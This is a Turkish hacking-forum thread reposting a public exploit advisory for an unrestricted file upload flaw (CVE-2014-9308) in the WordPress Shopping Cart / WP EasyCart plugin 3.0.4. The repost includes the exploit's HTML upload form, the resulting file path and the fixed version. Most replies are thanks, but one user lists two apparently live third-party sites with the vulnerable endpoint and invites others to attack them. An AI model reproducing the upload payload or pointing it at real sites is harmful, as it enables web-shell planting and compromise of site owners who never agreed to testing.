Konuyu Oyla:
  • Toplam: 0 Oy - Ortalama: 0
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: WordPress Shopping Cart 3.0.4 - Unrestricted File Upload
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,314 / 1,314
Deneyim: 59 / 100
Rep Sayısı: 136
Mesaj Sayısı: 5581
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
WordPress Shopping Cart 3.0.4 - Unrestricted File Upload
11.01.2015 13:50
# Exploit Title: WordPress Shopping Cart 3.0.4 Unrestricted File Upload
# Date: 29-10-2014
# Software Link: https://wordpress.org/plugins/wp-easycart/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9308
# Category: webapps


1. Description

Any registered user can upload any file because of incorrect if statement inside banneruploaderscript.php

PHP Kod:
http://security.szurek.pl/wordpress-shopping-cart-304-unrestricted-file-upload.html 


2. Proof of Concept

Login as regular user (created using wp-login.php?action=register):

PHP Kod:
<form action="http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php" method="post" enctype="multipart/form-data">
    <
input type="hidden" name="datemd5" value="1">
    <
input type="file" name="Filedata">
    <
input value="Upload!" type="submit">
</
form
File will be visible:
PHP Kod:
http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filename%_1.%fileextension% 

3. Solution:


Update to version 3.0.9
https://downloads.wordpress.org/plugin/w....3.0.9.zip


D4V3TS1Z
*
avatar
Sivile Alındı
Durum: Çevrimdışı
Seviye Puanı: 4
Yaşam Puanı: 1 / 82
Deneyim: 31 / 100
Rep Sayısı: 2
Mesaj Sayısı: 31
Üyelik Tarihi: 03.01.2015
     
Yorum: #2
Cvp: WordPress Shopping Cart 3.0.4 - Unrestricted File Upload
11.01.2015 13:52
teşekkürler elinize sağlık Exciting
kevin dark
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 1
Yaşam Puanı: 0 / 21
Deneyim: 86 / 100
Rep Sayısı: 0
Mesaj Sayısı: 9
Üyelik Tarihi: 11.01.2015
     
Yorum: #3
Cvp: WordPress Shopping Cart 3.0.4 - Unrestricted File Upload
11.01.2015 16:19
güzell. eline sağlık
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,379 / 1,379
Deneyim: 18 / 100
Rep Sayısı: 2805
Mesaj Sayısı: 6415
Üyelik Tarihi: 21.08.2013
     
Yorum: #4
Cvp: WordPress Shopping Cart 3.0.4 - Unrestricted File Upload
12.01.2015 12:49
süper bir açık değerlendirilmesi gerekiyor eline sağlık kardeşim Smile
ama çok az site çıkıyor.
Denemek isteyene site =>
1 - herocatscomic.com/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php
2 - supracompanies.com/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php
(Bu konu en son: 12.01.2015 Tarihinde, Saat: 12:53 düzenlenmiştir. Düzenleyen: KingSkrupellos.)

# KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army #



#H4CK4L
*
avatar
#R00T
Durum: Çevrimdışı
Seviye Puanı: 43
Yaşam Puanı: 1,055 / 1,055
Deneyim: 21 / 100
Rep Sayısı: 1066
Mesaj Sayısı: 3033
Üyelik Tarihi: 04.05.2013
      
Yorum: #5
Cvp: WordPress Shopping Cart 3.0.4 - Unrestricted File Upload
12.01.2015 13:16
Alışveriş Sitesi Bayılırım Exciting Exciting

Çocukken her akşam yatmadan önce Tanrı'ya bana bir bisiklet vermesi için dua ederdim. Bir gün Tanrı'nın çalışma tarzının bu olmadığını anladım. Ertesi gün gittim kendime yeni bir bisiklet çaldım ve her akşam yatmadan önce Tanrı'ya günahlarımı affetmesi için dua ettim.



1 Ziyaretçi